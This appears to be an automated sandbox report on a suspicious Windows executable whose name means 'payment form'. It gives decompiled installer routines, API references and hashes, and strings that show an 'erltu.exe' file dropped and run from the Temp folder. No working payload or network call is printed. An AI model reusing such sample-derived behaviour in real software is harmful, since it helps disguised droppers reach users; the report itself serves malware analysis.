													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x6de19c
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x423f4c; // 0x2
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x420524);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x423f80 = _a4;
					_t247 =  *0x423f4c; // 0x2
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x420524 = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x423f20, 0x6e);
					 *0x420518 =  *0x420518 | 0xffffffff;
					_v24 = _t250;
					 *0x420520 = SetWindowLongA(_v8, 0xfffffffc, E00404DEF);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42050c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42050c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if(_t258 != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							_push(_t258);
							_push(_t315);
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405B16(_t286, _t315, _t320)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403EF5(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403EF5(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x423f4c - _t318; // 0x2
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x420524 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x420524 + _t318 * 4) = _t274;
									_t288 =  *( *0x420524 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x423f4c; // 0x2
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403F2A(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403F2A(_v12);
								L89:
								return E00403F5C(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x0040480c
0x00404812
0x00404814
0x0040481a
0x00404820
0x00404823
0x0040482d
0x00404836
0x00404839
0x0040483c
0x00404a64
0x00404a64
0x00404a6b
0x00404a7f
0x00404a6d
0x00404a6f
0x00404a72
0x00404a73
0x00404a7a
0x00404a7a
0x00404a82
0x00404a8b
0x00404a96
0x00404a96
0x00404a99
0x00404a9c
0x00404aab
0x00404aab
0x00404ab2
0x00404b2a
0x00404b2a
0x00404b2d
0x00404b2f
0x00404b32
0x00404b39
0x00404b47
0x00404b47
0x00404b49
0x00404b4c
0x00404b53
0x00404b55
0x00404b59
0x00404b76
0x00404b7a
0x00404b7a
0x00404b5b
0x00404b68
0x00404b68
0x00404b59
0x00404b53
0x00000000
0x00404b2d
0x00404ab4
0x00404ab7
0x00404ac2
0x00404ac4
0x00404ac7
0x00404ace
0x00404ad3
0x00404ad5
0x00404adf
0x00404adf
0x00404ae3
0x00404ae5
0x00404ae8
0x00404aea
0x00404aed
0x00404b03
0x00404b03
0x00404aef
0x00404aef
0x00404af5
0x00404af7
0x00404afe
0x00404af9
0x00404af9
0x00404af9
0x00404af7
0x00404b07
0x00404b09
0x00404b0e
0x00404b17
0x00404b18
0x00404b22
0x00404b22
0x00404b24
0x00404b27
0x00404b27
0x00404ae8
0x00000000
0x00404ad5
0x00404ab9
0x00404abc
0x00404ac0
0x00000000
0x00000000
0x00000000
0x00404ac0
0x00404a9e
0x00404aa5
0x00000000
0x00000000
0x00000000
0x00404a8d
0x00404a8d
0x00404a90
0x00404b7d
0x00404b7d
0x00404b84
0x00404bf8
0x00404bf8
0x00404bff
0x00404c0b
0x00404c0b
0x00404c0d
0x00404c14
0x00404c16
0x00404c1b
0x00404c1d
0x00404c20
0x00404c20
0x00404c26
0x00404c2b
0x00404c2d
0x00404c30
0x00404c30
0x00404c36
0x00404c3c
0x00404c42
0x00404c42
0x00404c48
0x00404c4f
0x00404d9c
0x00404d9c
0x00404da3
0x00404da5
0x00404dac
0x00404db0
0x00404dbd
0x00404dbd
0x00404dc0
0x00404dc6
0x00404dd8
0x00404dd8
0x00404dac
0x00000000
0x00404c55
0x00404c57
0x00404c5c
0x00404c5f
0x00404c63
0x00404c63
0x00404c68
0x00404c6b
0x00404cac
0x00404cae
0x00404cb8
0x00404cbe
0x00404cc1
0x00404cc6
0x00404ccd
0x00404cd0
0x00404d72
0x00404d78
0x00404d7e
0x00404d83
0x00404d86
0x00404d97
0x00404d97
0x00000000
0x00404cd6
0x00404cd6
0x00404cd6
0x00404cd9
0x00404cdf
0x00404ce2
0x00404ce4
0x00404ce6
0x00404ce8
0x00404ceb
0x00404cee
0x00404cf5
0x00404cf7
0x00404cfa
0x00404d01
0x00404d04
0x00404d04
0x00404d04
0x00404d04
0x00404d08
0x00404d0b
0x00404d17
0x00404d18
0x00404d1b
0x00404d1d
0x00404d1d
0x00404d1d
0x00404d0d
0x00404d0f
0x00404d0f
0x00404d3c
0x00404d3c
0x00404d3d
0x00404d49
0x00404d58
0x00404d58
0x00404d5a
0x00404d5d
0x00404d66
0x00404d66
0x00000000
0x00404cd9
0x00404c6d
0x00404c78
0x00404c7b
0x00404c80
0x00404c82
0x00404c84
0x00404c86
0x00404c96
0x00404ca0
0x00404ca2
0x00404ca5
0x00000000
0x00000000
0x00000000
0x00000000
0x00404c88
0x00404c88
0x00404c88
0x00404c8b
0x00404c8e
0x00404c90
0x00404c90
0x00404c90
0x00404c91
0x00404c92
0x00404c92
0x00000000
0x00404c88
0x00404c6b
0x00404c4f
0x00404b86
0x00404b8c
0x00000000
0x00000000
0x00404b98
0x00404b9c
0x00000000
0x00000000
0x00404bac
0x00404bae
0x00404bb1
0x00000000
0x00000000
0x00404bc3
0x00404bc5
0x00404bc8
0x00404bd2
0x00404bd4
0x00404bd5
0x00404bd6
0x00404be5
0x00404be7
0x00404bee
0x00404bf1
0x00000000
0x00404bf1
0x00404bca
0x00404bcd
0x00404bd0
0x00000000
0x00000000
0x00000000
0x00404bd0
0x00000000
0x00404a90
0x00404842
0x00404847
0x0040484c
0x00404851
0x00404852
0x0040485b
0x00404866
0x00404871
0x00404877
0x00404885
0x0040489a
0x0040489f
0x004048aa
0x004048b3
0x004048c8
0x004048d9
0x004048e6
0x004048e6
0x004048eb
0x004048f1
0x004048f3
0x004048f6
0x004048fb
0x00404900
0x00404902
0x00404902
0x00404905
0x00404906
0x00404922
0x00404922
0x00404924
0x00404925
0x0040492a
0x0040492d
0x00404930
0x00404934
0x00404939
0x0040493e
0x00404942
0x00404947
0x0040494c
0x0040494e
0x00404950
0x00404956
0x00404a20
0x00404a33
0x00000000
0x0040495c
0x0040495f
0x00404962
0x00404965
0x00404965
0x0040496b
0x00404971
0x00404974
0x0040497a
0x0040497b
0x00404980
0x00404989
0x00404990
0x00404993
0x00404996
0x00404999
0x004049d3
0x004049d5
0x004049fe
0x004049d7
0x004049e4
0x004049e4
0x0040499b
0x0040499e
0x004049ad
0x004049b7
0x004049bf
0x004049c6
0x004049ce
0x004049ce
0x00404999
0x00404a04
0x00404a05
0x00404a0b
0x00404a11
0x00404a11
0x00404a1e
0x00404a39
0x00404a3d
0x00404a5a
0x00404a5f
0x00404a62
0x00404a62
0x00000000
0x00404a3f
0x00404a44
0x00404a4d
0x00404dda
0x00404dec
0x00404dec
0x00404a3d
0x00000000
0x00404a1e
0x00404956

APIs

GetDlgItem.USER32 ref: 00404805
GetDlgItem.USER32 ref: 00404812
GlobalAlloc.KERNEL32(00000040,00000002), ref: 0040485E
LoadBitmapA.USER32 ref: 00404871
SetWindowLongA.USER32 ref: 0040488B
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040489F
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004048B3
SendMessageA.USER32(?,00001109,00000002), ref: 004048C8
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048D4
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048E6
DeleteObject.GDI32(?), ref: 004048EB
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404916
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404922
SendMessageA.USER32(?,00001100,00000000,?), ref: 004049B7
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049E2
SendMessageA.USER32(?,00001100,00000000,?), ref: 004049F6
GetWindowLongA.USER32 ref: 00404A25
SetWindowLongA.USER32 ref: 00404A33
ShowWindow.USER32(?,00000005), ref: 00404A44
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B47
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BAC
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BC1
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BE5
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C0B
ImageList_Destroy.COMCTL32(?), ref: 00404C20
GlobalFree.KERNEL32 ref: 00404C30
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CA0
SendMessageA.USER32(?,00001102,00000410,?), ref: 00404D49
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D58
InvalidateRect.USER32(?,00000000,00000001), ref: 00404D78
ShowWindow.USER32(?,00000000), ref: 00404DC6
GetDlgItem.USER32 ref: 00404DD1
ShowWindow.USER32(00000000), ref: 00404DD8

Strings

N, xrefs: 00404A82
M, xrefs: 0040499E
, xrefs: 00404DB0

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 7416ecd40991322695bfc66f84475ccc40ce6f5cb9d88326faa3f420c439a296
Instruction ID: 4dc87105461fa9cd210088c80ac17c321b9292d6232489b395004e578f78c6e7
Opcode Fuzzy Hash: 7416ecd40991322695bfc66f84475ccc40ce6f5cb9d88326faa3f420c439a296
Instruction Fuzzy Hash: F0028EB0E00209AFDB20DF54DD45AAE7BB5EB84315F10817AF610BA2E1D7799A81CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404333 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 242
stringCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00404333(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr* _t81;
				int _t86;
				int _t88;
				int _t100;
				signed int _t105;
				char* _t110;
				intOrPtr _t112;
				intOrPtr _t113;
				intOrPtr* _t127;
				intOrPtr _t135;
				signed int _t139;
				signed int _t144;
				CHAR* _t150;

				_t75 =  *0x41fd00;
				_v36 = _t75;
				_t150 = ( *(_t75 + 0x3c) << 0xa) + 0x424000;
				_v12 =  *((intOrPtr*)(_t75 + 0x38));
				if(_a8 == 0x40b) {
					E004053A6(0x3fb, _t150);
					E00405D03(_t150);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							_t144 = _t143 | 0xffffffff;
							E004053A6(0x3fb, _t150);
							if(E004056C8(_t169, _t150) == 0) {
								_v8 = 1;
							}
							E00405AF4(0x41f4f8, _t150);
							_t80 = E0040567B(0x41f4f8);
							if(_t80 != 0) {
								 *_t80 =  *_t80 & 0x00000000;
							}
							_t81 = E00405DDA(0);
							if(_t81 == 0) {
								L29:
								_t86 = GetDiskFreeSpaceA(0x41f4f8,  &_v20,  &_v28,  &_v16,  &_v40);
								__eflags = _t86;
								if(_t86 == 0) {
									goto L32;
								}
								_t100 = _v20 * _v28;
								__eflags = _t100;
								_t144 = MulDiv(_t100, _v16, 0x400);
								goto L31;
							} else {
								_push( &_v32);
								_push( &_v24);
								_push( &_v44);
								_push(0x41f4f8);
								if( *_t81() == 0) {
									goto L29;
								}
								_t144 = (_v40 << 0x00000020 | _v44) >> 0xa;
								L31:
								_v12 = 1;
								L32:
								if(_t144 < E00404741(5)) {
									_v8 = 2;
								}
								_t135 =  *0x4236fc; // 0x6df5dc
								if( *((intOrPtr*)(_t135 + 0x10)) != 0) {
									E0040468C(0x3ff, 0xfffffffb, _t87);
									if(_v12 == 0) {
										SetDlgItemTextA(_a4, 0x400, 0x41f4e8);
									} else {
										E0040468C(0x400, 0xfffffffc, _t144);
									}
								}
								_t88 = _v8;
								 *0x423fc4 = _t88;
								if(_t88 == 0) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
									_v8 = 0;
								}
								E00403F17(0 | _v8 == 0x00000000);
								if(_v8 == 0 &&  *0x42051c == 0) {
									E004042C8();
								}
								 *0x42051c = 0;
								goto L46;
							}
						}
						_t169 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L46;
						}
						goto L22;
					}
					_t105 = _a12 & 0x0000ffff;
					if(_t105 != 0x3fb) {
						L12:
						if(_t105 == 0x3e9) {
							_t139 = 7;
							memset( &_v72, 0, _t139 << 2);
							_t143 = 0x420530;
							_v76 = _a4;
							_v68 = 0x420530;
							_v56 = E00404626;
							_v52 = _t150;
							_v64 = E00405B16(0x3fb, 0x420530, _t150);
							_t110 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t110, 0x41f900, _v12);
							if(_t110 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t110);
								E004055E7(_t150);
								_t112 =  *0x423f28; // 0x6ddfd8
								_t113 =  *((intOrPtr*)(_t112 + 0x11c));
								if(_t113 != 0 && _t150 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									_push(_t113);
									_push(0);
									E00405B16(0x3fb, 0x420530, _t150);
									_t143 = 0x422ec0;
									if(lstrcmpiA(0x422ec0, 0x420530) != 0) {
										lstrcatA(_t150, 0x422ec0);
									}
								}
								 *0x42051c =  *0x42051c + 1;
								SetDlgItemTextA(_a4, 0x3fb, _t150);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L46;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t143 = GetDlgItem(_a4, 0x3fb);
					if(E00405654(_t150) != 0 && E0040567B(_t150) == 0) {
						E004055E7(_t150);
					}
					 *0x4236f8 = _a4;
					SetWindowTextA(_t143, _t150);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403EF5(_a4);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403EF5(_a4);
					E00403F2A(_t143);
					_t127 = E00405DDA(7);
					if(_t127 == 0) {
						L46:
						return E00403F5C(_a8, _a12, _a16);
					}
					 *_t127(_t143, 1);
					goto L8;
				}
			}

0x00404339
0x00404340
0x0040434c
0x0040435a
0x00404362
0x00404366
0x0040436c
0x0040436c
0x00404378
0x004043ea
0x004043f1
0x004044c6
0x004044cd
0x004044dc
0x004044dc
0x004044e0
0x004044e6
0x004044e9
0x004044f6
0x004044f8
0x004044f8
0x00404506
0x0040450c
0x00404513
0x00404515
0x00404515
0x0040451a
0x00404526
0x0040454a
0x0040455b
0x00404561
0x00404563
0x00000000
0x00000000
0x00404569
0x00404569
0x00404577
0x00000000
0x00404528
0x0040452b
0x0040452f
0x00404533
0x00404534
0x00404539
0x00000000
0x00000000
0x00404541
0x00404579
0x00404579
0x00404580
0x00404589
0x0040458b
0x0040458b
0x00404592
0x0040459d
0x004045a7
0x004045af
0x004045c5
0x004045b1
0x004045b5
0x004045b5
0x004045af
0x004045ca
0x004045cf
0x004045d4
0x004045dd
0x004045dd
0x004045e6
0x004045e8
0x004045e8
0x004045f4
0x004045fc
0x00404606
0x00404606
0x0040460b
0x00000000
0x0040460b
0x00404526
0x004044cf
0x004044d6
0x00000000
0x00000000
0x00000000
0x004044d6
0x004043f7
0x004043fd
0x00404417
0x0040441c
0x00404426
0x0040442d
0x00404432
0x0040443c
0x0040443f
0x00404442
0x00404449
0x00404451
0x00404454
0x00404458
0x0040445f
0x00404467
0x004044bf
0x00404469
0x0040446a
0x00404471
0x00404476
0x0040447b
0x00404483
0x0040448d
0x0040448e
0x00404490
0x00404496
0x004044a4
0x004044a8
0x004044a8
0x004044a4
0x004044ad
0x004044b8
0x004044b8
0x00404467
0x00000000
0x0040441c
0x0040440a
0x00000000
0x00000000
0x00404410
0x00000000
0x0040437a
0x00404385
0x0040438e
0x0040439b
0x0040439b
0x004043a5
0x004043aa
0x004043b3
0x004043b6
0x004043bb
0x004043c3
0x004043c6
0x004043cb
0x004043d1
0x004043d8
0x004043df
0x00404611
0x00404623
0x00404623
0x004043e8
0x00000000
0x004043e8

APIs

GetDlgItem.USER32 ref: 0040437E
SetWindowTextA.USER32(00000000,?), ref: 004043AA
SHBrowseForFolderA.SHELL32(?,0041F900,?), ref: 0040445F
CoTaskMemFree.OLE32(00000000), ref: 0040446A
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph,00420530,00000000,?,?), ref: 0040449C
lstrcatA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph), ref: 004044A8
SetDlgItemTextA.USER32 ref: 004044B8

Part of subcall function 004053A6: GetDlgItemTextA.USER32 ref: 004053B9

Part of subcall function 00405D03: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D5B
Part of subcall function 00405D03: CharNextA.USER32(?,?,?,00000000), ref: 00405D68
Part of subcall function 00405D03: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D6D
Part of subcall function 00405D03: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\#U00d6DEME FORMU.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004032D2,C:\Users\user\AppData\Local\Temp\,00000000,0040342D), ref: 00405D7D

GetDiskFreeSpaceA.KERNEL32(0041F4F8,?,?,0000040F,?,00000000,0041F4F8,0041F4F8,?,?,000003FB,?), ref: 0040455B
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404571
SetDlgItemTextA.USER32 ref: 004045C5

Strings

A, xrefs: 00404458
C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph, xrefs: 00404496, 0040449B, 004044A6
C:\Users\user\AppData\Local\Temp, xrefs: 00404485

Memory Dump Source

Source File: 00000000.00000002.314228611.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.314224629.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314262962.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314268114.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314271950.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314296536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314349333.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.314354423.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_#U00d6DEME FORMU.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\erltu.exe C:\Users\user\AppData\Local\Temp\fvcshciph
API String ID: 2246997448-1836679805
Opcode ID: cb80a268bf24ae7fe0fa1031d8768fc716fd5deb7f04e988c4d677ddd980eb03
Instruction ID: 4b0f1e9708c527d2056c04b062cf11215df66417efe2c712fcd6d6fb4e9790ff
Opcode Fuzzy Hash: cb80a268bf24ae7fe0fa1031d8768fc716fd5deb7f04e988c4d677ddd980eb03
Instruction Fuzzy Hash: 7B817CB1900218BBDB11AFA1DC45A9F7BB8EF45314F00843AFA05B62D1D77C9A41CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00402078 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00402078(void* __eflags) {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A85(0xfffffff0);
				_t96 = E00402A85(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A85(2);
				 *((intOrPtr*)(_t100 - 0x3c)) = E00402A85(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A85(0x45);
				if(E00405654(_t96) == 0) {
					E00402A85(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407380, _t75, 1, 0x407370, _t44);
				if(_t44 < _t75) {
					L12:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407390, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x3c)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x3c)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x34)));
						if(_t95 >= _t75) {
							 *0x40a800 = _t75;
							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x40a800, 0x400);
							_t69 =  *((intOrPtr*)(_t100 - 8));
							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x40a800, 1);
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L12;
					}
				}
				E00401423();
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}

0x00402081
0x0040208b
0x00402094
0x0040209e
0x004020a7
0x004020b1
0x004020b5
0x004020b5
0x004020ba
0x004020cb
0x004020d3
0x004021b1
0x004021b1
0x004021b8
0x004020d9
0x004020d9
0x004020ea
0x004020ee
0x004020f4
0x004020fe
0x00402100
0x0040210b
0x0040210e
0x0040211b
0x0040211d
0x0040211f
0x00402126
0x00402129
0x00402129
0x0040212c
0x00402136
0x0040213e
0x00402143
0x0040214f
0x0040214f
0x00402152
0x0040215b
0x0040215e
0x00402167
0x0040216c
0x0040217e
0x00402187
0x0040218d
0x00402199
0x00402199
0x0040219b
0x004021a1
0x004021a1
0x004021a4
0x004021aa
0x004021af
